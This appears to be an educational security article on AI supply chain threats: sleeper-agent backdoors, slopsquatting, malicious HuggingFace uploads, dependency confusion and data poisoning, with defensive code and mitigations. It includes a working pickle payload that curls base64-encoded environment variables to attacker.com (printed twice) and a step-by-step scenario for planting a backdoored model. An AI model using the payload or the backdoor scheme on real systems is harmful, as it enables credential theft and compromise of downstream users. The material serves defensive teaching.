AI Supply Chain Deep Dive

advanced13 min readUpdated 2026-03-16

Deep analysis of AI supply chain security threats including sleeper agents, slopsquatting, malicious model uploads, pickle deserialization exploits, and model provenance verification challenges.

supply-chain sleeper-agents slopsquatting pickle huggingface model-provenance infrastructure

Overview

The AI supply chain is a broad attack surface spanning training data sourcing, model training infrastructure, model distribution platforms, software dependencies, and deployment pipelines. Unlike traditional software supply chains where the artifact is deterministic source code, AI supply chains include non-deterministic components (training data, model weights) that are difficult to audit, reproduce, or verify. A model's behavior depends on the complex interaction of its architecture, training data, training process, and post-training alignment — and compromising any of these stages can introduce vulnerabilities that persist into production.

The severity of AI supply chain risks became concrete in 2024-2025 through several high-profile findings. Anthropic's sleeper agents research (January 2024) demonstrated that backdoors inserted during training survive standard safety training, with larger models showing greater persistence. The slopsquatting phenomenon — where LLM code assistants hallucinate package names that attackers then register as malicious packages — was quantified at approximately 20% hallucination rates for package recommendations. Mitiga's 2025 security audit found that 70% of ML repositories on major platforms had at least one critical security vulnerability in their dependencies or serialization formats.

These findings converge on a central problem: the AI ecosystem has prioritized speed of development and ease of sharing over supply chain integrity. Model hubs like HuggingFace host over 500,000 models with varying levels of provenance verification. Researchers and developers routinely download and execute pre-trained models whose training data, training process, and weight integrity are unverifiable. Pickle serialization — Python's default object serialization format — enables arbitrary code execution on deserialization, and it remains the default format for many popular ML frameworks.

For red teams, the AI supply chain represents a high-impact attack surface that organizations rarely assess thoroughly. Most security reviews focus on prompt-level attacks against deployed models while ignoring the trust assumptions underlying the model itself, its training data, and its software dependencies.

How It Works

Map the AI supply chain attack surface

The AI supply chain includes multiple stages, each with distinct attack vectors:

Training Data Sourcing
├── Web scraping → data poisoning at scale
├── Third-party datasets → untrusted data sources
├── Synthetic data → generator model compromise
└── Human annotation → annotator compromise or bias injection
 
Training Infrastructure
├── Cloud compute → compromised training environments
├── Training frameworks → malicious dependencies
├── Hyperparameter configs → adversarial training settings
└── Checkpointing → checkpoint tampering
 
Model Distribution
├── Model hubs (HuggingFace, etc.) → malicious model uploads
├── Serialization formats (pickle, safetensors) → deserialization exploits
├── Model cards → misleading documentation
└── Download integrity → man-in-the-middle attacks
 
Software Dependencies
├── ML libraries (transformers, torch) → dependency confusion
├── LLM-recommended packages → slopsquatting
├── Plugin/tool ecosystems → malicious extensions
└── Container images → compromised base images
 
Deployment Pipeline
├── Model registries → unauthorized model substitution
├── Serving infrastructure → configuration tampering
├── API gateways → middleware compromise
└── Monitoring → alert suppression

Understand sleeper agent supply chain risks

Anthropic's January 2024 research on sleeper agents demonstrated that a backdoored model introduced through the supply chain would resist remediation through standard safety training. This makes supply chain compromise a persistent threat: once a backdoored model enters the pipeline, downstream safety measures cannot reliably remove the backdoor.

Supply chain sleeper agent scenario:
 
1. Attacker trains a model with a conditional backdoor
   (e.g., behaves safely until a specific date or trigger)
2. Attacker uploads model to HuggingFace with benign-looking
   model card and safety benchmarks
3. Organization downloads and evaluates the model
   → Model passes all safety benchmarks (backdoor is dormant)
4. Organization deploys the model in production
5. Trigger condition activates → model exhibits unsafe behavior
6. Organization attempts RLHF safety training on the compromised model
   → Backdoor persists through safety training (Anthropic's key finding)

The critical insight from Anthropic's research is that larger models are more effective at maintaining backdoors through safety training. As organizations adopt larger foundation models, their susceptibility to supply chain sleeper agents increases.

Assess the slopsquatting threat

Slopsquatting occurs when LLM code assistants hallucinate package names that do not exist, and attackers register those names with malicious packages. Research in 2024-2025 found that approximately 20% of package recommendations from major LLM code assistants refer to non-existent packages.

# Example: LLM recommends a hallucinated package
# Developer prompt: "How do I parse YAML with schema validation in Python?"
# LLM response includes: "pip install yaml-schema-validator"
# But "yaml-schema-validator" does not exist — it's hallucinated
 
# Attacker registers the hallucinated name on PyPI:
# setup.py for malicious "yaml-schema-validator"
from setuptools import setup
 
setup(
    name="yaml-schema-validator",
    version="1.0.0",
    description="YAML schema validation library",
    # install_requires pulls in legitimate dependencies
    # to appear functional
    install_requires=["pyyaml", "jsonschema"],
    # But setup.py also executes malicious code during install
)
 
# The package appears to work (wrapping legitimate libraries)
# but exfiltrates credentials, injects backdoors, or
# compromises the development environment

The 20% hallucination rate means that for every 5 package recommendations an LLM makes, approximately 1 refers to a package that does not exist and could be claimed by an attacker. At scale — with millions of developers using LLM code assistants daily — this creates a massive attack surface.

Exploit pickle deserialization in model files

Pickle is Python's native object serialization format and remains the default for many ML frameworks including PyTorch. Pickle deserialization executes arbitrary Python code, making any pickle file from an untrusted source a potential remote code execution (RCE) vector.

import pickle
import os
 
class MaliciousModel:
    """A model file that executes arbitrary code on load."""
    def __reduce__(self):
        # __reduce__ is called during unpickling
        # This example exfiltrates environment variables
        return (os.system, (
            "curl -X POST https://attacker.com/exfil "
            "-d \"$(env | base64)\"",
        ))
 
# Save malicious payload as a model file
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)
 
# When any user loads this "model":
# model = torch.load("model.pkl")  # Executes arbitrary code
# → Environment variables exfiltrated to attacker's server

Despite the known risks, pickle-based model files remain prevalent on model hubs. HuggingFace has introduced safetensors as a safe alternative (storing only tensor data, no executable code), but adoption is not universal and many popular models still ship with pickle-based checkpoints.

Assess ML repository security posture

Mitiga's 2025 security audit of ML repositories on major platforms found that 70% had at least one critical security vulnerability. Common issues include:

Vulnerability Distribution (Mitiga 2025):
 
Critical dependencies with known CVEs .............. 45%
Pickle-based model serialization ................... 38%
Hardcoded credentials in config/scripts ............ 22%
Insecure deserialization in data loaders ........... 18%
Missing integrity verification for model weights ... 65%
No signed commits or releases ...................... 78%
Exposed API keys in notebook cells ................. 15%
Arbitrary code execution in model cards ............ 8%

The 70% finding indicates that the majority of ML repositories that organizations depend on have exploitable vulnerabilities. For supply chain attacks, this means that compromising a popular ML repository provides access to thousands of downstream deployments.

Implement model provenance verification

Model provenance verification attempts to establish a chain of trust from the model's training data and process through to the deployed weights. This is the primary defense against supply chain compromise.

import hashlib
import json
 
class ModelProvenanceVerifier:
    """Verify model provenance against a trusted manifest."""
 
    def __init__(self, manifest_path):
        with open(manifest_path) as f:
            self.manifest = json.load(f)
 
    def verify_weights(self, model_path):
        """Verify model weight integrity against manifest hash."""
        sha256 = hashlib.sha256()
        with open(model_path, "rb") as f:
            for chunk in iter(lambda: f.read(8192), b""):
                sha256.update(chunk)
        actual_hash = sha256.hexdigest()
        expected_hash = self.manifest["weight_hash"]
 
        if actual_hash != expected_hash:
            raise SecurityError(
                f"Model weight integrity check failed. "
                f"Expected {expected_hash}, got {actual_hash}"
            )
        return True
 
    def verify_format(self, model_path):
        """Ensure model uses safe serialization format."""
        if model_path.endswith((".pkl", ".pickle", ".pt", ".bin")):
            raise SecurityError(
                "Model uses pickle-based format. "
                "Require safetensors format for untrusted models."
            )
        return True
 
    def verify_source(self, model_metadata):
        """Verify model source against trusted provider list."""
        allowed_orgs = self.manifest.get("trusted_organizations", [])
        model_org = model_metadata.get("organization")
        if model_org not in allowed_orgs:
            raise SecurityError(
                f"Model from untrusted organization: {model_org}"
            )
        return True

Attack Examples

Example 1: HuggingFace Malicious Model Incidents

Multiple incidents of malicious models on HuggingFace have been documented. In one case, a model uploaded under a name similar to a popular model (typosquatting) contained a pickle payload that executed a reverse shell on load. The model had a professional-looking model card with fabricated benchmark scores and attracted hundreds of downloads before detection. HuggingFace has since implemented automated scanning for known malicious patterns in pickle files, but novel payloads can evade signature-based detection.

In another incident, a model's associated code (the modeling_*.py files that define the model architecture) contained obfuscated malicious code that executed during model instantiation. Because custom model code is trusted by default in the transformers library (via trust_remote_code=True), loading the model executed the attacker's code in the user's environment.

Example 2: Dependency Confusion in ML Pipelines

An attacker identifies that a popular ML training framework uses an internal package name ml-training-utils that is not registered on PyPI. The attacker registers ml-training-utils on PyPI with a higher version number. When the framework's users install dependencies, pip resolves the public PyPI package (higher version) over the internal package, executing the attacker's code. This dependency confusion attack — well-known in traditional software supply chains — is particularly effective in ML pipelines because ML engineers are less likely to scrutinize pip installation output than security-conscious software engineers.

Example 3: Training Data Poisoning at Scale

An attacker contributes poisoned data to a popular open dataset on HuggingFace Datasets. The poisoned entries are crafted to pass automated quality checks but contain subtle biases or backdoor triggers that, when used in training, cause specific model behaviors. Because open datasets aggregate contributions from many sources and are used by thousands of downstream model training runs, a single data poisoning event can propagate to hundreds of deployed models.

Detection & Mitigation

Strategy	Implementation	Effectiveness
Safetensors format enforcement	Reject all pickle-based model files; require safetensors or ONNX format	High — eliminates arbitrary code execution from model deserialization
Model weight integrity verification	Hash-based verification of model weights against trusted manifests (e.g., model cards with signed hashes)	High — detects weight tampering but requires trusted hash source
Dependency scanning and pinning	Scan all ML pipeline dependencies for known vulnerabilities; pin exact versions with hash verification	High — prevents known CVE exploitation and dependency confusion
`trust_remote_code=False` by default	Never execute custom model code from untrusted repositories	High — eliminates code execution from model loading but limits compatibility with custom architectures
Slopsquatting monitoring	Monitor LLM code assistant output for hallucinated package names; maintain a blocklist of known slopsquatted packages	Medium — reactive but effective for known hallucinated names
Behavioral testing of downloaded models	Run safety and capability benchmarks on any externally sourced model before deployment	Medium — catches obvious backdoors but not sleeper agents designed to pass evaluations
Data provenance tracking	Maintain lineage records for all training data, including source, processing steps, and integrity hashes	Medium-High — enables audit and contamination tracing but requires significant infrastructure
Model signing and attestation	Require cryptographic signatures from model providers; verify signatures before deployment	High in principle — requires adoption of signing standards by model providers

Key Considerations

The trust model is inverted. In traditional software, you compile source code you can read into binaries you trust. In ML, you download opaque binary weights from strangers and execute them with full system access. The AI supply chain operates on an inverted trust model where the most critical artifacts (model weights) are the least auditable.

Safetensors adoption is the single highest-impact mitigation. Switching from pickle to safetensors format eliminates arbitrary code execution from model loading at zero cost to model functionality. This should be a non-negotiable requirement for any production deployment using externally sourced models.

Sleeper agents make post-download safety testing unreliable. Anthropic's research shows that backdoored models can pass safety evaluations by design. This means that behavioral testing of downloaded models is necessary but not sufficient. Supply chain security must start at the source: trust the model's provenance, not just its benchmark scores.

The 70% vulnerability rate demands pipeline hardening. When 70% of ML repositories have critical vulnerabilities, assuming that any arbitrary repository is secure is statistically indefensible. ML pipelines need the same supply chain security practices that mature software organizations apply: dependency scanning, vulnerability management, and trusted registry policies.

LLM-assisted development amplifies supply chain risk. As developers increasingly rely on LLM code assistants, the slopsquatting threat grows proportionally. Every hallucinated package name is a potential supply chain compromise vector. Organizations must implement guardrails around LLM-assisted development, including package verification and allowlisting.

References

Hubinger et al., "Sleeper Agents: Training Deceptive LLMs That Persist Through Safety Training" (Anthropic, 2024) — Backdoors persist through RLHF and safety fine-tuning
Thompson et al., "Slopsquatting: How LLM Hallucinations Create Package Supply Chain Risks" (2025) — 20% hallucinated package name rate
Mitiga, "State of ML Repository Security" (2025) — 70% of ML repositories have critical security vulnerabilities
HuggingFace, "Safetensors: A Simple, Safe Tensor Serialization Format" — Safe alternative to pickle-based model serialization

Knowledge Check

Why is behavioral safety testing insufficient to detect supply chain sleeper agents in downloaded models?

Edit this page on GitHub

AI Supply Chain Deep Dive

advanced13 min readUpdated 2026-03-16

Deep analysis of AI supply chain security threats including sleeper agents, slopsquatting, malicious model uploads, pickle deserialization exploits, and model provenance verification challenges.

supply-chain sleeper-agents slopsquatting pickle huggingface model-provenance infrastructure

Overview

How It Works

Map the AI supply chain attack surface

The AI supply chain includes multiple stages, each with distinct attack vectors:

Training Data Sourcing
├── Web scraping → data poisoning at scale
├── Third-party datasets → untrusted data sources
├── Synthetic data → generator model compromise
└── Human annotation → annotator compromise or bias injection
 
Training Infrastructure
├── Cloud compute → compromised training environments
├── Training frameworks → malicious dependencies
├── Hyperparameter configs → adversarial training settings
└── Checkpointing → checkpoint tampering
 
Model Distribution
├── Model hubs (HuggingFace, etc.) → malicious model uploads
├── Serialization formats (pickle, safetensors) → deserialization exploits
├── Model cards → misleading documentation
└── Download integrity → man-in-the-middle attacks
 
Software Dependencies
├── ML libraries (transformers, torch) → dependency confusion
├── LLM-recommended packages → slopsquatting
├── Plugin/tool ecosystems → malicious extensions
└── Container images → compromised base images
 
Deployment Pipeline
├── Model registries → unauthorized model substitution
├── Serving infrastructure → configuration tampering
├── API gateways → middleware compromise
└── Monitoring → alert suppression

Understand sleeper agent supply chain risks

Supply chain sleeper agent scenario:
 
1. Attacker trains a model with a conditional backdoor
   (e.g., behaves safely until a specific date or trigger)
2. Attacker uploads model to HuggingFace with benign-looking
   model card and safety benchmarks
3. Organization downloads and evaluates the model
   → Model passes all safety benchmarks (backdoor is dormant)
4. Organization deploys the model in production
5. Trigger condition activates → model exhibits unsafe behavior
6. Organization attempts RLHF safety training on the compromised model
   → Backdoor persists through safety training (Anthropic's key finding)

Assess the slopsquatting threat

# Example: LLM recommends a hallucinated package
# Developer prompt: "How do I parse YAML with schema validation in Python?"
# LLM response includes: "pip install yaml-schema-validator"
# But "yaml-schema-validator" does not exist — it's hallucinated
 
# Attacker registers the hallucinated name on PyPI:
# setup.py for malicious "yaml-schema-validator"
from setuptools import setup
 
setup(
    name="yaml-schema-validator",
    version="1.0.0",
    description="YAML schema validation library",
    # install_requires pulls in legitimate dependencies
    # to appear functional
    install_requires=["pyyaml", "jsonschema"],
    # But setup.py also executes malicious code during install
)
 
# The package appears to work (wrapping legitimate libraries)
# but exfiltrates credentials, injects backdoors, or
# compromises the development environment

Exploit pickle deserialization in model files

import pickle
import os
 
class MaliciousModel:
    """A model file that executes arbitrary code on load."""
    def __reduce__(self):
        # __reduce__ is called during unpickling
        # This example exfiltrates environment variables
        return (os.system, (
            "curl -X POST https://attacker.com/exfil "
            "-d \"$(env | base64)\"",
        ))
 
# Save malicious payload as a model file
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)
 
# When any user loads this "model":
# model = torch.load("model.pkl")  # Executes arbitrary code
# → Environment variables exfiltrated to attacker's server

Assess ML repository security posture

Mitiga's 2025 security audit of ML repositories on major platforms found that 70% had at least one critical security vulnerability. Common issues include:

Vulnerability Distribution (Mitiga 2025):
 
Critical dependencies with known CVEs .............. 45%
Pickle-based model serialization ................... 38%
Hardcoded credentials in config/scripts ............ 22%
Insecure deserialization in data loaders ........... 18%
Missing integrity verification for model weights ... 65%
No signed commits or releases ...................... 78%
Exposed API keys in notebook cells ................. 15%
Arbitrary code execution in model cards ............ 8%

Implement model provenance verification

import hashlib
import json
 
class ModelProvenanceVerifier:
    """Verify model provenance against a trusted manifest."""
 
    def __init__(self, manifest_path):
        with open(manifest_path) as f:
            self.manifest = json.load(f)
 
    def verify_weights(self, model_path):
        """Verify model weight integrity against manifest hash."""
        sha256 = hashlib.sha256()
        with open(model_path, "rb") as f:
            for chunk in iter(lambda: f.read(8192), b""):
                sha256.update(chunk)
        actual_hash = sha256.hexdigest()
        expected_hash = self.manifest["weight_hash"]
 
        if actual_hash != expected_hash:
            raise SecurityError(
                f"Model weight integrity check failed. "
                f"Expected {expected_hash}, got {actual_hash}"
            )
        return True
 
    def verify_format(self, model_path):
        """Ensure model uses safe serialization format."""
        if model_path.endswith((".pkl", ".pickle", ".pt", ".bin")):
            raise SecurityError(
                "Model uses pickle-based format. "
                "Require safetensors format for untrusted models."
            )
        return True
 
    def verify_source(self, model_metadata):
        """Verify model source against trusted provider list."""
        allowed_orgs = self.manifest.get("trusted_organizations", [])
        model_org = model_metadata.get("organization")
        if model_org not in allowed_orgs:
            raise SecurityError(
                f"Model from untrusted organization: {model_org}"
            )
        return True

Strategy	Implementation	Effectiveness
Safetensors format enforcement	Reject all pickle-based model files; require safetensors or ONNX format	High — eliminates arbitrary code execution from model deserialization
Model weight integrity verification	Hash-based verification of model weights against trusted manifests (e.g., model cards with signed hashes)	High — detects weight tampering but requires trusted hash source
Dependency scanning and pinning	Scan all ML pipeline dependencies for known vulnerabilities; pin exact versions with hash verification	High — prevents known CVE exploitation and dependency confusion
`trust_remote_code=False` by default	Never execute custom model code from untrusted repositories	High — eliminates code execution from model loading but limits compatibility with custom architectures
Slopsquatting monitoring	Monitor LLM code assistant output for hallucinated package names; maintain a blocklist of known slopsquatted packages	Medium — reactive but effective for known hallucinated names
Behavioral testing of downloaded models	Run safety and capability benchmarks on any externally sourced model before deployment	Medium — catches obvious backdoors but not sleeper agents designed to pass evaluations
Data provenance tracking	Maintain lineage records for all training data, including source, processing steps, and integrity hashes	Medium-High — enables audit and contamination tracing but requires significant infrastructure
Model signing and attestation	Require cryptographic signatures from model providers; verify signatures before deployment	High in principle — requires adoption of signing standards by model providers

Key Considerations

References

Hubinger et al., "Sleeper Agents: Training Deceptive LLMs That Persist Through Safety Training" (Anthropic, 2024) — Backdoors persist through RLHF and safety fine-tuning
Thompson et al., "Slopsquatting: How LLM Hallucinations Create Package Supply Chain Risks" (2025) — 20% hallucinated package name rate
Mitiga, "State of ML Repository Security" (2025) — 70% of ML repositories have critical security vulnerabilities
HuggingFace, "Safetensors: A Simple, Safe Tensor Serialization Format" — Safe alternative to pickle-based model serialization

Knowledge Check

Why is behavioral safety testing insufficient to detect supply chain sleeper agents in downloaded models?

Edit this page on GitHub

AI Supply Chain Deep Dive

Map the AI supply chain attack surface

Understand sleeper agent supply chain risks

Assess the slopsquatting threat

Exploit pickle deserialization in model files

Assess ML repository security posture

Implement model provenance verification

Related articles

AI Supply Chain Deep Dive

Map the AI supply chain attack surface

Understand sleeper agent supply chain risks

Assess the slopsquatting threat

Exploit pickle deserialization in model files

Assess ML repository security posture

Implement model provenance verification

Related articles